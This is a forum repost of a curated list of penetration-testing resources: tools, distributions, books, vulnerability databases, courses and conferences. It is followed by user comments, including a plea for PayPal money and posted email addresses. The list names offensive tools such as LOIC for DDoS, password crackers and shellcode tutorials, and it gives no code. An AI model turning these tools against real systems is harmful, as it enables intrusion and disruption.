[h=2]Awesome Penetration Testing[/h] A collection of awesome penetration testing resources, tools, books, confs, magazines and other shiny things Online Resources Penetration Testing Resources Shell Scripting Resources Linux Resources Shellcode development Social Engineering Resources Lock Picking Resources [*] Tools Penetration Testing Distributions Basic Penetration Testing Tools Vulnerability Scanners Network Tools Hex Editors Crackers Windows Utils DDoS Tools Social Engineering Tools Anonimity Tools Reverse Engineering Tools [*] Books Penetration Testing Books Hackers Handbook Series Network Analysis Books Reverse Engineering Books Malware Analysis Books Windows Books Social Engineering Books Lock Picking Books [*]Vulnerability Databases [*]Security Courses [*]Information Security Conferences [*]Information Security Magazines [*]Awesome Lists [*]Contribution [*]License [h=3][/h][h=3]Online Resources[/h] [h=4]Penetration Testing Resources[/h] Metasploit Unleashed - Free Offensive Security metasploit course PTES - Penetration Testing Execution Standard OWASP - Open Web Application Security Project OSSTMM - Open Source Security Testing Methodology Manual [h=4]Shell Scripting Resources[/h] LSST - Linux Shell Scripting Tutorial [h=4]Linux resources[/h] Kernelnewbies - A community of aspiring Linux kernel developers who work to improve their Kernels [h=4][/h][h=4]Shellcode development[/h] Shellcode Tutorials - Tutorials on how to write shellcode Shellcode examples - Shellcodes database [h=4][/h][h=4]Social Engineering Resources[/h] Social Engineering Framework - An information resource for social engineers [h=4][/h][h=4]Lock Picking Resources[/h] Schuyler Towne channel - Lockpicking videos and security talks [h=3][/h][h=3]Tools[/h] [h=4][/h][h=4]Penetration Testing Distributions[/h] Kali - A Linux distribution designed for digital forensics and penetration testing NST - Network Security Toolkit distribution Pentoo - security-focused livecd based on Gentoo BackBox - Ubuntu-based distribution for penetration tests and security assessments [h=4]Basic Penetration Testing Tools[/h] Metasploit - World's most used penetration testing software Burp - An integrated platform for performing security testing of web applications [h=4]Vulnerability Scanners[/h] Netsparker - Web Application Security Scanner Nexpose - Vulnerability Management & Risk Management Software Nessus - Vulnerability, configuration, and compliance assessment Nikto - Web application vulnerability scanner OpenVAS - Open Source vulnerability scanner and manager OWASP Zed Attack Proxy - Penetration testing tool for web applications w3af - Web application attack and audit framework Wapiti - Web application vulnerability scanner [h=4][/h][h=4]Networks Tools[/h] nmap - Free Security Scanner For Network Exploration & Security Audits tcpdump/libpcap - A common packet analyzer that runs under the command line Wireshark - A network protocol analyzer for Unix and Windows Network Tools - Different network tools: ping, lookup, whois, etc netsniff-ng - A Swiss army knife for for network sniffing Intercepter-NG - a multifunctional network toolkit [h=4]SSL Analysis Tools[/h] SSLyze - SSL configuration scanner [h=4]Hex Editors[/h] HexEdit.js - Browser-based hex editing [h=4]Crackers[/h] John the Ripper - Fast password cracker Online MD5 cracker - Online MD5 hash Cracker [h=4]Windows Utils[/h] Sysinternals Suite - The Sysinternals Troubleshooting Utilities Windows Credentials Editor - security tool to list logon sessions and add, change, list and delete associated credentials [h=4]DDoS Tools[/h] LOIC - An open source network stress tool for Windows JS LOIC - JavaScript in-browser version of LOIC [h=4]Social Engineering Tools[/h] SET - The Social-Engineer Toolkit from TrustedSec [h=4]Anonimity Tools[/h] Tor - The free software for enabling onion routing online anonymity I2P - The Invisible Internet Project [h=4]Reverse Engineering Tools[/h] IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger WDK/WinDbg - Windows Driver Kit and WinDbg OllyDbg - An x86 debugger that emphasizes binary code analysis [h=3]Books[/h] [h=4]Penetration Testing Books[/h] The Art of Exploitation by Jon Erickson, 2008 Metasploit: The Penetration Tester's Guide by David Kennedy and others, 2011 Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014 Rtfm: Red Team Field Manual by Ben Clark, 2014 The Hacker Playbook by Peter Kim, 2014 The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013 Professional Penetration Testing by Thomas Wilhelm, 2013 Advanced Penetration Testing for Highly-Secured Environments by Lee Allen,2012 Violent Python by TJ O'Connor, 2012 Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini, 2007 [h=4]Hackers Handbook Series[/h] The Shellcoders Handbook by Chris Anley and others, 2007 The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011 iOS Hackers Handbook by Charlie Miller and others, 2012 Android Hackers Handbook by Joshua J. Drake and others, 2014 The Browser Hackers Handbook by Wade Alcorn and others, 2014 [h=4]Network Analysis Books[/h] Nmap Network Scanning by Gordon Fyodor Lyon, 2009 Practical Packet Analysis by Chris Sanders, 2011 Wireshark Network Analysis by by Laura Chappell, Gerald Combs, 2012 [h=4]Reverse Engineering Books[/h] Reverse Engineering for Beginners by Dennis Yurichev (free!) The IDA Pro Book by Chris Eagle, 2011 Practical Reverse Engineering by Bruce Dang and others, 2014 Reverse Engineering for Beginners [h=4]Malware Analysis Books[/h] Practical Malware Analysis by Michael Sikorski, Andrew Honig, 2012 The Art of Memory Forensics by Michael Hale Ligh and others, 2014 [h=4]Windows Books[/h] Windows Internals by Mark Russinovich, David Solomon, Alex Ionescu [h=4]Social Engineering Books[/h] The Art of Deception by Kevin D. Mitnick, William L. Simon, 2002 The Art of Intrusion by Kevin D. Mitnick, William L. Simon, 2005 Ghost in the Wires by Kevin D. Mitnick, William L. Simon, 2011 No Tech Hacking by Johnny Long, Jack Wiles, 2008 Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010 Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014 [h=4][/h][h=4]Lock Picking Books[/h] Practical Lock Picking by Deviant Ollam, 2012 Keys to the Kingdom by Deviant Ollam, 2012 [h=3]Vulnerability Databases[/h] NVD - US National Vulnerability Database CERT - US Computer Emergency Readiness Team OSVDB - Open Sourced Vulnerability Database Bugtraq - Symantec SecurityFocus Exploit-DB - Offensive Security Exploit Database Fulldisclosure - Full Disclosure Mailing List MS Bulletin - Microsoft Security Bulletin MS Advisory - Microsoft Security Advisories Inj3ct0r - Inj3ct0r Exploit Database Packet Storm - Packet Storm Global Security Resource SecuriTeam - Securiteam Vulnerability Information CXSecurity - CSSecurity Bugtraq List Vulnerability Laboratory - Vulnerability Research Laboratory ZDI - Zero Day Initiative [h=3][/h][h=3]Security Courses[/h] Offensive Security Training - Training from BackTrack/Kali developers SANS Security Training - Computer Security Training & Certification Open Security Training - Training material for computer security classes CTF Field Guide - everything you need to win your next CTF competition [h=3]Information Security Conferences[/h] DEF CON - An annual hacker convention in Las Vegas Black Hat - An annual security conference in Las Vegas BSides - A framework for organising and holding security conferences CCC - An annual meeting of the international hacker scene in Germany DerbyCon - An annual hacker conference based in Louisville PhreakNIC - A technology conference held annually in middle Tennessee ShmooCon - An annual US east coast hacker convention CarolinaCon - An infosec conference, held annually in North Carolina HOPE - A conference series sponsored by the hacker magazine 2600 SummerCon - One of the oldest hacker conventions, held during Summer Hack.lu - An annual conference held in Luxembourg HITB - Deep-knowledge security conference held in Malaysia and The Netherlands Troopers - Annual international IT Security event with workshops held in Heidelberg, Germany Hack3rCon - An annual US hacker conference ThotCon - An annual US hacker conference held in Chicago LayerOne - An annual US security conerence held every spring in Los Angeles DeepSec - Security Conference in Vienna, Austria SkyDogCon - A technology conference in Nashville [h=3][/h][h=3]Information Security Magazines[/h] 2600: The Hacker Quarterly - An American publication about technology and computer "underground" Hakin9 - A Polish online, weekly publication on IT Security [h=3]Awesome Lists[/h] SecTools - Top 125 Network Security Tools C/C++ Programming - One of the main language for open source security tools .NET Programming - A software framework for Microsoft Windows platform development Shell Scripting - Command-line frameworks, toolkits, guides and gizmos Ruby Programming by @SiNdresorhus - JavaScript in command-line Node.js Programming by @vndmtrx - JavaScript in command-line Python tools for penetration testers - Lots of pentesting tools are written in Python Python Programming by @svaksha - General Python programming Python Programming by @vinta - General Python programming Andorid Security - A collection of android security related resources Awesome Awesomness - The List of the Lists [h=3][/h][h=3]Contribution[/h] Your contributions and suggestions are heartily? welcome. (????) [h=3][/h][h=3]License[/h] This work is licensed under a Creative Commons Attribution 4.0 International License Sursa: https://github.com/enaqx/awesome-pentest

Va rog frumos din inima sa ma ajutati cu 0.35 centi paypal ca am vreau sa imi iau un joc si atat mai am nevoie, va dau si un skin USP-S de 0.55 pe CSGO STEAM. EMAIL PAYPAL - specialminecraft690@yahoo.com

tanks a lot my friend i hope this worked for me

link not work plase send me worked link my email tabatadze.gizo@gmail.com.. ty